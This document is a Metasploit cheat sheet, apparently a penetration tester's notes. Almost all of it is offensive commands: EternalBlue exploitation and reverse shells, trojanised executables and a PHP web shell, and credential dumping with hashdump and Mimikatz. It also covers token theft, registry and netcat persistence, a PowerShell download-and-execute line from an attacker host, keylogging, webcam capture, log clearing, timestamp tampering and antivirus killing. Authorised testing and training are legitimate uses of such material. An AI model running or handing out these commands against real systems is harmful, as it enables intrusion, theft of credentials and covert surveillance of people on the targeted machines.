Metasploit


# Startup

service postgresql start                          Start the postgresql db
msfdb init                                        Create and initialize the msf db
msfconsole                                        Start Metasploit
db_status                                                                                                                                                                                                                                                                                                                                              Confirm that Metasploit is connected to the db
------------------------------------------------------------------------------------------------------

# Troubleshooting

- If the db connection fails:
exit
cat /usr/share/metasploit-framework/config/database.yml
Copy the password.

su postgres
createuser msf -P
Enter password for new role:
Enter it again:

psql
CREATE DATABASE msf;
GRANT ALL PRIVILEGES ON DATABASE msf to msf;
ALTER DATABASE msf OWNER TO msf;
\q
exit

service postgresql restart
msfdb init
msfconsole
db_status

- Module database cache not built yet, using slow search
db_rebuild_cache                                  Rebuilds the database-stored module cache
------------------------------------------------------------------------------------------------------

# Help

help or ?                                         Show available commands and their descriptions
grep -h                                           Show help on the 'grep' command
------------------------------------------------------------------------------------------------------

# Searching

search <string>
search ms17                                       Show all Microsoft exploits released in 2017

grep <string> search <type>
grep php search payloads                          Search payloads then grep for php
grep linux show post                              Search post exploitation modules then grep for linux
grep -v gather search post/windows
------------------------------------------------------------------------------------------------------

# Basic usage

show <all, auxiliary, encoders, exploits, nops, options, payloads, plugins, post>

use <auxiliary, encoder, exploit, nop, payload, post>

use exploit/windows/smb/ms17_010_eternalblue
show info
show targets                                      Show OSs that can be targeted with this exploit
set rhost <target IP>
show payloads                                     Show payloads that work with this exploit
set payload windows/x64/meterpreter/reverse_tcp
show options                                      Show remaining options for the payload
set lhost <attacker IP>                           Set to the attacker's IP
set lport <attacker port>                         Set the listening port to 443
show advanced
show evasion
exploit                                           Run the exploit
------------------------------------------------------------------------------------------------------

# Payloads

msfvenom -p <payload variable=value> -f <format> -a <arch> --platform <OS platform> -o <output file>

- Generate a bind payload that avoids a bad character:
msfvenom -p windows/meterpreter/bind_tcp -b '\x00'

- Generate a bind payload and encode it 3 times:
msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3

- Inject a bind payload into calc.exe and save it as an executable:
msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -k -f exe > calc2.exe

- Generate a reverse payload and save it as an executable:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.10 LPORT=443 -f exe -a x86_64 —platform windows -o /root/evil64.exe

- Generate PHP web shell and upload to a web server:
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.0.10 LPORT=443 -a php -e php/base64 -f raw -o /root/webshell.php
upload /root/webshell.php /var/www/
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
------------------------------------------------------------------------------------------------------

# Database

workspace                                         Show workspaces (* shows the active workspace)
* default
  client1
  client2

workspace client1                                 Switch workspace

workspace                                         List workspaces
  default
* client1                                         * shows the active workspace
  client2

workspace -a <name>                               Add workspace(s)
workspace -d <name>                               Delete workspace(s)
workspace -r <old> <new>                          Rename workspace

db_import <path to file>
hosts                                             Confirm hosts have been imported

db_export -f xml /root/msf.xml                    Backup db in xml format

hosts -h                                          Show help on the host command
services -h                                       Show help on the services command

services -c port,protocol,name                    Show specific columns
services -p 22                                    Search for a specific port
services -s http                                  Search for a specific service

creds
loot -h                                           Show help on the loot command
------------------------------------------------------------------------------------------------------

# Meterpreter

You will need to be at a Meterpreter prompt (meterpreter >) instead of a Metasploit prompt (msf >) 
to run Meterpreter commands.

help
background                                        Send the current session to the background, and return to the 'msf' prompt

cat <file>                                        Show the contents of a file
edit <file>                                       Edit the contents of a file using vim
execute -f cmd.exe -i -H                          Run a command on the target

cd                                                Change directory
ls                                                List directory
pwd                                               Print working directory

lcd                                               Change the local directory
lpwd                                              Print the local working directory

download c:\\boot.ini                             Download a file from the target (use double back slashes)
upload evil.exe c:\\windows\\system32             Upload a file to the target (use double back slashes)

clearev                                           Clear the Application, System, and Security logs on a Windows target
getuid                                            Show the user that Meterpreter is running as
hashdump                                          Dump the SAM database
idletime                                          Show the number of seconds the user on the target has been idle
ipconfig                                          Show the network interfaces and addresses on the target
migrate                                           Migrate to another process
ps                                                Show running processes
resource                                          Execute Meterpreter instructions in a file
search -f <file>                                  Locate files on the target
shell                                             Drop to a standard shell on the target
webcam_list                                       Show currently available web cams
webcam_snap                                       Takes a picture from the web cam
------------------------------------------------------------------------------------------------------

# Sessions

sessions -h                                       Show help on the sessions command
sessions -l                                       Show active sessions
sessions -i 2                                     Interact with session 2
ctrl z                                            Background the current session

Many options allow specifying session ranges using commas and dashes. For example:
     sessions -s checkvm -i 1,3-6
     sessions -k 1-3,6
------------------------------------------------------------------------------------------------------

# Post exploitation

sysinfo                                           Gets information about the remote system, such as OS
getuid                                            Get the user that the server is running as
ps                                                Search for a process running as NT AUTHORITY\SYSTEM (or root on *nix)
migrate <PID>                                     Migrate to a process running as NT AUTHORITY\SYSTEM (or root on *nix)
------------------------------------------------------------------------------------------------------

# Privilege escalation - Windows

- Option 1
use priv                                          Attempt to elevate to NT AUTHORITY\SYSTEM
getsystem                                         Will use a number of different techniques to attempt to gain SYSTEM 
                                                       level privileges on the remote system
background                                        If this fails, background the current session and try other options

- Option 2
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

- Option 3
use post/windows/escalate/getsystem
set SESSION 1
run

getuid
getsystem
getuid                                            Privileges should now be NT AUTHORITY\SYSTEM

- Option 4
use post/windows/escalate/droplnk
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
set LPORT 444                                     This MUST be a different port from what was used in the original exploit
exploit

- Option 5
use exploit/windows/local/bypassuac
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
set LPORT 444
exploit

- Option 6
use exploit/windows/local/                        There are currently 77 options - 12/29/19
------------------------------------------------------------------------------------------------------

# Dump hashes

ps                                                Show running processes
migrate <PID>                                     Migrate to a process running as NT AUTHORITY\SYSTEM
hashdump                                          Dump password hashes

run post/windows/gather/credentials/credential_collector
run post/windows/gather/credentials/domain_hashdump        This only works on a DC
run post/windows/gather/credentials/gpp
------------------------------------------------------------------------------------------------------

# Mimikatz

load kiwi                                         Load Mimikatz
creds_all                                         Retrieve all credentials
creds_kerberos                                    Retrieve Kerberos creds
creds_livessp                                     Retrieve LiveSSP creds
creds_msv                                         Retrieve LM/NTLM creds (hashes)
creds_ssp                                         Retrieve SSP creds
creds_tspkg                                       Retrieve TsPkg creds
creds_wdigest                                     Retrieve WDigest creds
golden_ticket_create                              Create a golden kerberos ticket
kerberos_ticket_list                              List all kerberos tickets
kerberos_ticket_purge                             Purge any in-use kerberos tickets
kerberos_ticket_use                               Use a kerberos ticket
lsa_dump_sam                                      Dump LSA SAM
lsa_dump_secrets                                  Dump LSA secrets
------------------------------------------------------------------------------------------------------

# Steal tokens

use incognito
list_tokens -u                                    List of tokens that are available

impersonate_token <domain>\\<user>                Impersonate a domain account
getuid
rev2self                                          Revert back to the original token
getuid

impersonate_token "NT AUTHORITY\SYSTEM"           Impersonate a local account

ps                                                Show running processes
steal_token <PID>
getuid
drop_token                                        Revert back to the orginal token
getuid
------------------------------------------------------------------------------------------------------

# Establish persistence

Option 1:
run persistence -h
run persistence <starts at computer startup> <tries to connect every 30s> <port 443> <attacker IP>
run persistence -X -i 30 -p 443 -r <target IP>
Notice that it shows where the file is stored on the Windows machine.
It also gives you the location of the Meterpreter resource file you can run to remove persistence.

Example:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
set LPORT 443
set ExitOnSession false
set AutoRunScript persistence -X -i 30 -p 443 -r <target IP>
exploit -j -z

Option 2 - Add a user:
add_user <user> <password> -h <target IP>
add_group_user "Domain Admins" <user> -h <target IP>

Option 3 - Scheduled:
info exploit/windows/local/s4u_persistence

Notice the trigger methods: event, lock, logon, schedule, unlock

use exploit/windows/local/s4u_persistence
set session 1
set TRIGGER lock
exploit

Option 4 - Volume Shadow Copy:
use exploit/windows/local/vss_persistence
set session 1
set RHOST <target IP>
set LPORT 4445  <———use a different port number
exploit

Option 5 - Upload netcat:
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32\\

- If the target is Linux: set AutoRunscript post/linux/manage/sshkey_persistence
This lets you automatically establish persistence, without having to think about it.

Check for anything the runs at startup.
meterpreter > reg enumkey -k HKLM\\software\\windows\\currentversion\\run

Add a registry key.
meterpreter > reg setval -k HKLM\\software\\windows\\currentversion\\run -v netcat -d ‘c:\windows\system32\nc.exe -ldp 443 -e cmd.exe'

Verify changes to the registry.
meterpreter > reg queryval -k HKLM\\software\\windows\\currentversion\\run -v netcat

Reboot the target system.
meterpreter >  reboot

Connect to target system - option 1:
Open a new Terminal: nc -vn <target IP> 443

Connect to target system - option 2:
use multi/handler
set PAYLOAD windows/shell_bind_tcp
set RHOST <target IP>
exploit
------------------------------------------------------------------------------------------------------

# Enumeration

run killav
run getcountermeasure
run winenum
run post/windows/gather/checkvm
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
run post/windows/gather/usb_history
reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
------------------------------------------------------------------------------------------------------

# Upload tools

upload <local path> <remote path>
upload /usr/share/windows-binaries/nc.exe c:\\
------------------------------------------------------------------------------------------------------

# Lateral movement

use windows/smb/psexec
set RHOST <target IP>
set SMBUser <user>
set SMBPass <password or hash>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <local IP>
set LPORT <local port>
exploit

powershell -command "IEX (New-Object Net.WebClient).DownloadString('http://hacker IP/Powersploit/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -lhost <local IP> -lport <local port> -Force"
------------------------------------------------------------------------------------------------------

# Pivoting

run post/multi/manage/autoroute                   Add routes to all local subnets
run arp_scanner -r 10.10.0.1/24

use auxiliary/scanner/portscan/tcp
set RHOSTS 10.0.0.0/24
set PORTS 445
set THREADS 10
run
------------------------------------------------------------------------------------------------------

# Cross platform exploit

- Windows
use exploit/multi/script/web_delivery
set lhost <attacker IP>
set lport <attacker port>
show targets
set target 2                                      Set the target language to PowerShell
set payload windows/meterpreter/reverse_tcp
exploit

- Linux and OS X
use exploit/multi/script/web_delivery
set lhost <attacker IP>
set lport <attacker port>
set target 0                                      Set the target language to Python
set payload python/meterpreter/reverse_tcp
exploit
------------------------------------------------------------------------------------------------------

# Post exploitation of a domain controller (DC)


run windows/gather/enum_ad_computers              Find all Active Directory users
run windows/gather/enum_logged_on_users           Enumerate all logged on users
run windows/gather/enum_ad_groups                 Gather all Groups in Active Directory
run windows/gather/enum_shares                    Find all shared folders in Active Directory


- Add any user in Active Directory
run windows/manage/add_user_domain
set addtodomain true
set username hacker
set password w00t!
set session 1
exploit

- Delete any user in Active Directory
run windows/manage/delete_user
set username hacker
set session 1
exploit

run windows/gather/enum_ad_computers              Windows Gather Active Directory Computers
run windows/gather/enum_ad_groups                 Windows Gather Active Directory Groups
run windows/gather/enum_ad_users                  Windows Gather Active Directory Users
run windows/gather/enum_domain                    Windows Gather Enumerate Domain
run windows/gather/enum_domains                   Windows Gather Domain Enumeration
------------------------------------------------------------------------------------------------------

# Misc

idletime                                          Returns the number of seconds the remote user has been idle
     If time < 5 min
     keyscan_start                                Start capturing keystrokes
     keyscan_stop                                 Stop capturing keystrokes
     keyscan_dump                                 Dump the keystroke buffer

screenshot                                        Grab a screenshot of the interactive desktop

timestomp                                         Manipulate file MACE attributes

run vnc
     If the screen is locked exit VNC
     Run screen_unlock

